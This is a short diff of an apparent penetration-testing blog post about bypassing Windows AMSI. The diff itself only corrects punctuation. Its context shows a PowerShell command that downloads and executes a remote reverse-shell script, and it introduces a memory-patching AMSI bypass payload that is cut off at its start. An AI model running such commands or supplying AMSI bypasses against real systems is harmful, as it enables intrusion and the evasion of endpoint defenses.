Kwangyun/Kwangyun.github.io/_posts/2023-05-10-Bypassing-AMSI-2023.md

 ![](/assets/AV/Final.gif)

-To verify that AMSI is correctly functioning, the tester first tried to initiate a reverse TCP connection through powershell using the below command
+To verify that AMSI is correctly functioning, the tester first tried to initiate a reverse TCP connection through powershell using the below command.
 ```bash
 IEX (New-Object Net.WebClient).DownloadString('http://192.168.20.128:8443/Invoke-PowerShellTcp.ps1')
 ```
 However, as seen above, AMSI sucessfully flags the activity as  `malicious` and proceeds to block the reverse shell connection.
 ## Memory Patching
-In order to bypass AMSI, the tester utilzed the following payload which was referenced [Red Team Playbook](https://www.xn--hy1b43d247a.com/defense-evasion/amsi-bypass)
+In order to bypass AMSI, the tester utilzed the following payload which was referenced from [Red Team Playbook](https://www.xn--hy1b43d247a.com/defense-evasion/amsi-bypass)
 ```bash
 $thing = @"
 // thing